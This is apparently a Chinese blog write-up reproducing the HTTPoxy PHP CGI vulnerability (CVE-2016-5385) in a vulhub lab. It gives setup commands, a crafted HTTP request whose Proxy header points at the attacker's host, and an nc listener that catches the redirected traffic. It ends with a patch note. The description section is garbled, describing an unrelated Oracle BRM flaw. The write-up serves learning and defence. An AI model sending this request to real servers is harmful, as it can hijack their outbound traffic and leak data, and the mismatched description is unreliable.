PHP HTTPoxy CGI 应用程序漏洞 CVE-2016-5385

HTTPoxy CGI 应用程序漏洞 CVE-2016-5385 已亲自复现

漏洞名称

漏洞描述

在Oracle Communications BRM 10.x/12.x(云软件)中发现漏洞。它已经被宣布为关键。此漏洞影响组件用户数据库的未知功能。升级可消除此漏洞。在泄露漏洞后立即发布了可能的缓解措施。可以使用Snort ID 39737来识别攻击企图。

影响版本

Redhat Enterprise_Linux_Server 6.0

Oracle Communications_User_Data_Repository 12.0.0

Oracle Enterprise_Manager_Ops_Center 12.3.2

Oracle Communications_User_Data_Repository 10.0.0

8.0.0 <= Drupal < 8.1.7

漏洞复现

环境搭建

受害者IP:192.168.63.129:8080

攻击者IP:192.168.63.1

vulhub下载链接

bash 复制代码
https://github.com/vulhub/vulhub
git clone https://github.com/vulhub/vulhub.git

启动vulfocus

bash 复制代码
docker-compose up -d 

环境启动后,访问http://192.168.63.129:8080即可看到一个nginx页面,说明已成功启动。

漏洞利用

正常请求http://192.168.63.129:8080/index.php,可见其Origin为当前请求的服务器,这里用的自己搭建的环境,因此返回公网的IP地址。正常情况下与请求头中的host一致。

在请求头中加入proxy代理,这里的Proxy: http://192.168.63.1:1234/不是 HTTP 代理,在主机192.168.63.1中不存在该http服务。因此在响应体中返回报错信息。

bash 复制代码
GET /index.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Proxy: http://192.168.63.1:1234/

在192.168.63.1主机上监听端口,我们可以捕获原始请求。

bash 复制代码
nc -lvnp 1234

在vulhub的官网中,响应体返回了正常的请求内容,在Origin返回当前请求的服务器,与上面返回错误不同的是,这里使用的是可以访问的HTTP代理,存在http服务。

修复建议

1、补丁链接:https://www.php.net/downloads 5.6.24修复了该漏洞

相关推荐
2501_9151063219 小时前
TraceEagle 代理抓包教程 本机和手机的 HTTPS 抓包方法
网络协议·计算机网络·网络安全·ios·adb·https·udp
广州灵眸科技有限公司1 天前
瑞芯微RV1126B开发板(EASY-EAI-PI2) 系统操作-线进程操作
数据库·单片机·嵌入式硬件·算法·php
apihz1 天前
全国油价查询免费 API 接口详解与调用实战(PHP / Python)
android·python·php·dubbo·天气预报·油价
Chockmans1 天前
春秋云境CVE-2023-51385(保姆级教学)
大数据·web安全·elasticsearch·搜索引擎·网络安全·春秋云境·cve-2023-51385
tommyjiatong1 天前
解决 WordPress 必须带 index.php 才能访问及无法提交站点地图(Sitemap)的底层原理与方案
php·网站搭建·wordpress
ICT系统集成阿祥1 天前
WAF部署方式对比(主流5种:透明桥、反向代理、旁路镜像、串接路由、云WAF)
网络安全·waf·部署模式
清欢渡---1 天前
HCIP-第五章vrrp
网络·网络安全·hcip
三8441 天前
PHP+MariaDB/MySQL搭建 社区论坛
mysql·php·mariadb
云云只是个程序马喽2 天前
海外短剧平台搭建方案:私有化源码系统选型|云微短剧系统技术架构拆解
java·php
小小小小钰儿2 天前
网络安全名词术语!
安全·web安全·计算机·网络安全·黑客·编程